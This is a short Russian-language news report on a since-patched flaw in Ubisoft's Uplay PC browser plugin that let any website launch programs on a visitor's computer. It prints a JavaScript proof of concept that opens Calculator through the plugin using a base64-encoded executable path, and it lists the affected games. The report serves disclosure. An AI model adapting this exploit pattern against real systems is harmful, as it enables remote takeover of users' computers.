В игровом приложении Uplay от компании Ubisoft обнаружена ошибка, которая позволяет с любого сайта получить контроль над компьютером пользователя.
Демо-страница, которая показывает работу бэкдора (запускает на вашем компьютере приложение «Калькулятор»):
http://pastehtml.com/view/c6gxl1a79.html
Код:
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Бэкдор можно сравнить с известным руткитом Sony BMG. Вместе с играми Ubisoft на компьютер пользователя устанавливается программа Uplay PC, которая создаёт плагин для браузера, предоставляющий неограниченно широкие полномочия для сайтов, которые обращаются к нему.
Список игр Ubisoft:
Assassin's Creed II
Assassin's Creed: Brotherhood
Assassin's Creed: Project Legacy
Assassin's Creed Revelations
Assassin's Creed III
Beowulf: The Game
Brothers in Arms: Furious 4
Call of Juarez: The Cartel
Driver: San Francisco
Heroes of Might and Magic VI
Just Dance 3
Prince of Persia: The Forgotten Sands
Pure Football
R.U.S.E.
Shaun White Skateboarding
Silent Hunter 5: Battle of the Atlantic
The Settlers 7: Paths to a Kingdom
Tom Clancy's H.A.W.X. 2
Tom Clancy's Ghost Recon: Future Soldier
Tom Clancy's Splinter Cell: Conviction
Your Shape: Fitness Evolved
Компания Ubisoft уже выпустила патч для Uplay, закрывающий эту уязвимость.
